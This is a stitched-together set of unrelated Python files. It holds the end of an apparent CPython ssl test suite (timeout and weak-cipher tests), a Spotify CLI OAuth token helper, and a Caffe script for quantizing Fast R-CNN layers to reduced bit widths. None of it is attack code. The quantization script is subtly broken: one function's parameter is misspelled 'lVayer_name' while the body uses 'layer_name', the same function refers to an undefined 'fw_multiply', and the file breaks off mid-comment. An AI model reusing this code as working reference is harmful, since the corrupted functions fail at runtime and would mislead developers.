server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = test_support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c = ssl.wrap_socket(c)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_default_ciphers(self):
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
sock = socket.socket()
try:
# Force a set of weak ciphers on our client socket
try:
s = ssl.wrap_socket(sock,
ssl_version=ssl.PROTOCOL_SSLv23,
ciphers="DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with self.assertRaises((OSError, ssl.SSLError)):
s.connect((HOST, server.port))
finally:
sock.close()
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_main(verbose=False):
global CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, NOKIACERT
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir,
"keycert.pem")
SVN_PYTHON_ORG_ROOT_CERT = os.path.join(
os.path.dirname(__file__) or os.curdir,
"https_svn_python_org_root.pem")
NOKIACERT = os.path.join(os.path.dirname(__file__) or os.curdir,
"nokia.pem")
if (not os.path.exists(CERTFILE) or
not os.path.exists(SVN_PYTHON_ORG_ROOT_CERT) or
not os.path.exists(NOKIACERT)):
raise test_support.TestFailed("Can't read certificate files!")
tests = [BasicTests, BasicSocketTests]
if test_support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = test_support.threading_setup()
if thread_info and test_support.is_resource_enabled('network'):
tests.append(ThreadedTests)
try:
test_support.run_unittest(*tests)
finally:
if _have_threads:
test_support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
__init__.py | from threading import Thread
try:
# Python 3 modules
from http.server import SimpleHTTPRequestHandler, HTTPServer
from urllib.parse import urlencode
import urllib.parse as urlparse
except ImportError:
# Python 2 modules
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer
from urllib import urlencode
import urlparse
import base64
import time
import requests
import webbrowser
LISTENER_PORT = 9020
REDIRECT_URI = 'http://localhost:%d/' % LISTENER_PORT
SCOPES = [
'user-read-currently-playing',
'user-read-playback-state'
]
RESPONSE_HTML = b"""
<html>
<head>
<title>Spotify CLI</title>
</head>
<body>
<script type="text/javascript">
window.close();
</script>
</body>
</html>
"""
def get_authorization_code(client_id):
class AuthorizationHandler(SimpleHTTPRequestHandler):
last_code = None
def do_GET(self):
self.send_response(200, 'OK')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(RESPONSE_HTML)
parsed = urlparse.parse_qs(self.path[2:])
if 'code' not in parsed:
return
code = parsed['code'][0]
AuthorizationHandler.last_code = code
t = Thread(target=self.server.shutdown)
t.daemon = True
t.start()
def log_message(self, format, *args):
pass
server = HTTPServer(('localhost', LISTENER_PORT), AuthorizationHandler)
server_thread = Thread(target=server.serve_forever)
server_thread.start()
authorize_user(client_id)
server_thread.join()
return AuthorizationHandler.last_code
def authorize_user(client_id):
url = get_authorization_url(client_id)
webbrowser.open_new(url)
def get_authorization_url(client_id):
query = {
'client_id': client_id,
'response_type': 'code',
'redirect_uri': REDIRECT_URI,
'scope': ' '.join(SCOPES)
}
return 'https://accounts.spotify.com/authorize?' + urlencode(query)
def get_access_token(client_id, client_secret, code):
payload = {
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': REDIRECT_URI
}
return request_access_token(client_id, client_secret, payload)
def refresh_access_token(client_id, client_secret, access_token):
token_time = access_token['time']
current_time = int(time.time())
expires_in = access_token['expires_in']
if current_time - token_time < expires_in:
return None
payload = {
'grant_type': 'refresh_token',
'refresh_token': access_token['refresh_token']
}
return dict(access_token, **request_access_token(client_id, client_secret, payload))
def request_access_token(client_id, client_secret, payload):
url = 'https://accounts.spotify.com/api/token'
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
r = requests.post(url, data=payload, headers=headers, auth=(client_id, client_secret))
r.raise_for_status()
return dict(r.json(), **{
'time': int(time.time())
})
def get_current_playing(access_token):
url = 'https://api.spotify.com/v1/me/player/currently-playing'
headers = {
'Authorization': access_token['token_type'] + ' ' + access_token['access_token']
}
r = requests.get(url, headers=headers)
r.raise_for_status()
if r.status_code == 204:
return None
return r.json()
def format_current_playing(playing_data):
item = playing_data['item']
artists = format_artists(item['artists'])
album = item['album']
return '%s [%s] - %s' % (artists, album['name'], item['name'])
def format_artists(artists):
return ', '.join(map(lambda x: x['name'], artists))
|
quantize_pvalite-CLN3.py | #!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from utils.timer import Timer
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Quantize a Fast R-CNN network')
parser.add_argument('--gpu', dest='gpu_id', help='GPU id to use',
default=0, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant', dest='prototxt_quantized',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--act_analysis', dest='act_analysis',
help='input and output analysis file',
default=None, type=str)
parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
help='adder and multiplier analysis file',
default=None, type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--comp', dest='comp_mode', help='competition mode',
action='store_true')
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--vis', dest='vis', help='visualize detections',
action='store_true')
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--error_margin', dest='error_margin',
help='tolerance error of quantized network',
default=0.1, type=float)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def analyze_network(net_proto):
has_fc = False
has_deconv = False
has_conv = False
for l in net_proto.layer:
if l.type == 'Convolution':
has_conv = True
elif l.type == 'Deconvolution':
has_deconv = True
elif l.type =='InnerProduct':
has_fc = True
return has_conv, has_deconv, has_fc
# convert network to quantized network with 32 bit width
def convert_net_to_qnet(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='InnerProduct':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='Deconvolution':
l.type = 'DeconvolutionRistretto'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
write_to_prototxt(net_proto, q_net_path)
# convert network to quantized network with 32 bit width
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
write_to_prototxt(net_proto, q_net_path)
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
bw_layer_in, fl_layer_in,
bw_layer_out, fl_layer_out,
bw_params, fl_params,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.precision = 0
l.quantization_param.bw_layer_in = int(bw_layer_in)
l.quantization_param.bw_layer_out = int(bw_layer_out)
l.quantization_param.bw_params = int(bw_params)
l.quantization_param.bw_add = int(bw_add)
l.quantization_param.bw_multiply = int(bw_multiply)
l.quantization_param.fl_layer_in = int(fl_layer_in)
l.quantization_param.fl_layer_out= int(fl_layer_out)
l.quantization_param.fl_params = int(fl_params)
l.quantization_param.fl_add = int(fl_add)
l.quantization_param.fl_multiply = int(fl_multiply)
return net_proto
def change_layer_BAC_bw(net_proto, lVayer_name,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.bw_add = bw_add
l.quantization_param.fl_add = fl_add
l.quantization_param.bw_multiply = bw_multiply
l.quantization_param.fl_multiply = fw_multiply
return net_proto
def change_layer_bottom_name(net_proto, layer_name,
layer_bottom_name):
for l in net_proto.layer:
if l.name == layer_name:
l.bottom = layer_bottom_name
return net_proto
def change_layer_top_name(net_proto, layer_name,
layer_top_name):
for l in net_proto.layer:
if l.name == layer_name:
l.top = layer_top_name
return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net,layer):
layer_param = net.params[layer.name]
max_weight = max(layer_param[0].data[...].max(), layer_param[0].data[...].min(), key=abs)
if layer.convolution_param.bias_term:
max_bias = max(layer_param[1].data[...].max(), layer_param[1].data[...].min(), key=abs)
else:
max_bias = 0
max_param = max(max_weight, max_bias, key=abs)
return math.ceil(math.log(abs(max_param), 2)) + 1
def analyze_net_param_IL(net, net_proto):
net_param_IL = dict()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_param_IL[layer.name] = calc_layer_param_IL(net, layer)
return net_param_IL
#calculate needed Integer Length of layer output
def calc_layer_inout_IL(net, layer_bottom_name):
layer_output = net.blobs[layer_bottom_name].data
layer_output_max = abs(max(layer_output.max(), layer_output.min(), key=abs))
#if layer_bottom_name == 'data':
# print net.blobs[layer_bottom_name].data
# print math.ceil(math.log(layer_output_max, 2)) + 1
return math.ceil(math.log(layer_output_max, 2)) + 1
def analyze_net_output_IL(net, net_proto, imdb, max_per_image=100, thresh=0.05, vis=False):
num_images = len(imdb.image_index)
_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
if not cfg.TEST.HAS_RPN:
roidb = imdb.roidb
net_output_IL = dict()
net_input_IL = dict()
for layer in net_proto.layer:
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_output_IL[layer.name] = -sys.maxint - 1
net_input_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_images):
if cfg.TEST.HAS_RPN:
box_proposals = None
else:
box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
im = cv2.imread(imdb.image_path_at(i))
scores, boxes = im_detect(net, im, _t, box_proposals)
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
#print layer.type, layer.name, net_output_IL[layer.name],net_input_IL[layer.name]
return net_output_IL, net_input_IL
#calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
layer_adder_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[0],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[1],
key=abs))
return math.ceil(math.log(layer_adder_max, 2)) + 1
#calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
layer_multiplier_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[2],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[3],
key=abs))
return math.ceil(math.log(layer_multiplier_max, 2)) + 1
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto, imdb, max_per_image=100, thresh=0.05, vis=False):
num_images = len(imdb.image_index)
_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
if not cfg.TEST.HAS_RPN:
roidb = imdb.roidb
net_adder_IL = dict()
net_multiplier_IL = dict()
for layer in net_proto.layer:
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' :
net_adder_IL[layer.name] = -sys.maxint - 1
net_multiplier_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_images):
print i
if cfg.TEST.HAS_RPN:
box_proposals = None
else:
box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
im = cv2.imread(imdb.image_path_at(i))
scores, boxes = im_detect(net, im, _t, box_proposals)
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
net.params[layer.name][0].data[0][0][0][0]=2610214
elif layer.type == 'FcIVS':
net.params[layer.name][0].data[0][0]=2610214
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
net_adder_IL[layer.name])
net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
net_multiplier_IL[layer.name])
return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
adder_IL = net_adder_IL[layer.name] + extra_IL
adder_FL = adder_bw - adder_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
adder_bw, adder_FL, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
multiplier_IL = net_multiplier_IL[layer.name] + extra_IL
multiplier_FL = multiplier_bw - multiplier_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
multiplier_bw, multiplier_FL, \
)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
input_bw = output_bw;
#input_FL = 0;
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name] + extra_IL
input_FL = input_bw - input_IL
#if layer.name=='conv1_1/conv':
# print input_IL,output_IL
#print layer.name
#if layer.name == 'conv1_1/conv':
# print output_IL
# continue
change_layer_bw(net_proto, layer.name, \
input_bw, input_FL, \
output_bw, output_FL, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#input_FL = output_FL
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'FcIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'DeconvolutionRistretto':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
net_proto = caffe_pb2.NetParameter()
fn = ori_net_path;
with open(fn) as f:
s = f.read()
txtf.Merge(s, net_proto)
return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
outf = out_net_path
#print 'writing', outf
with open(outf, 'w') as f:
f.write(str(net_proto))
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
net.name = os.path.splitext(os.path.basename(caffemodel_path))[0]
ap = test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
return ap
#print each layer name and spec
def print_net_layer_names(net):
print("Network layers:")
for name, layer in zip(net._layer_names, net.layers):
if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
print dir(layer)
print layer.reshape
print layer.convolution_param
print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
#caffe.set_mode_cpu()
#GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
imdb = get_imdb(args.imdb_name)
imdb.competition_mode(args.comp_mode)
if not cfg.TEST.HAS_RPN:
imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
ap = test_qnet(net_path, args.caffemodel, imdb)
shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
#caffe.set_mode_cpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
imdb = get_imdb(args.imdb_name)
imdb.competition_mode(args.comp_mode)
if not cfg.TEST.HAS_RPN:
imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_output_IL_, net_input_IL_ = analyze_net_output_IL(net, net_proto, imdb, max_per_image=args.max_per_image, vis=args.vis)
for t in net_output_IL_.keys():
net_output_IL[t] = net_output_IL_[t]
for t in net_input_IL_.keys():
net_input_IL[t] = net_input_IL_[t]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
#caffe.set_mode_cpu()
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
imdb = get_imdb(args.imdb_name)
imdb.competition_mode(args.comp_mode)
if not cfg.TEST.HAS_RPN:
imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_adder_IL_, net_multiplier_IL_ = analyze_net_adder_multiplier_IL(net_BAC, net_proto_BAC, imdb,
max_per_image=args.max_per_image, vis=args.vis)
for t in net_adder_IL_.keys():
net_adder_IL[t] = net_adder_IL_[t]
for t in net_multiplier_IL_.keys():
net_multiplier_IL[t] = net_multiplier_IL_[t]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
net_param_IL_ = analyze_net_param_IL(net, net_proto)
for t in net_param_IL_.keys():
net_param_IL[t] = net_param_IL_[t]
if __name__ == '__main__':
args = parse_args()
GPU1 = 0
GPU2 = 1
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
print('Using config:')
pprint.pprint(cfg)
manager = multiprocessing.Manager()
shared_dict = manager.dict()
full_ap = 0.661509413341
layer_ap = 0.652
print 'Full precision accuracy : {}'.format(full_ap)
print 'Q8 accuracy : {}'.format(layer_ap)
# Bit Width for Analyze
bw_range_conv = [8, 4] #bit width for convolution layers
bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
bw_conv = 0 #just initial
bw_deconv = 0 #just initial
bw_fc = 0 #just initial
bw_output = 8 #just initial
bw_adder = 12 #just initial
bw_multiplier = 12 #just initial
convIL_reduction = 0
deconvIL_reduction = 0
fcIL_reduction = 0
actIL_reduction = -1
adderIL_reduction = 0
multIL_reduction = 0
print 'Create Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Bit-Accurate quantized prototxt'
#print 'Analyzing network adder and multiplier'
net_adder_IL = manager.dict()
net_multiplier_IL = manager.dict()
if args.accumulator_analysis == None:
print 'Analyzing network adder and multiplier'
p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
args=(net_adder_IL, net_multiplier_IL, GPU1))
p.start()
p.join()
with open('accumulator_analysis.json', 'w') as outfile:
accumulator_analysis = dict()
accumulator_analysis['net_adder_IL'] = dict()
accumulator_analysis['net_multiplier_IL'] = dict()
for t in net_adder_IL.keys():
accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
for t in net_multiplier_IL.keys():
accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
json.dump(accumulator_analysis, outfile)
else:
print 'Loading network adder and multiplier analysis file'
with open(args.accumulator_analysis) as json_data:
accumulator_analysis = json.load(json_data)
for t in accumulator_analysis['net_adder_IL'].keys():
net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
for t in accumulator_analysis['net_multiplier_IL'].keys():
net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
print 'Analyzing layer multiplier'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
bw_multiplier = j
not_found = False
break;
i = i + 2
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer multiplier'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_multiplier(net_BAC, net_proto_BAC, net_multiplier_IL, bw)
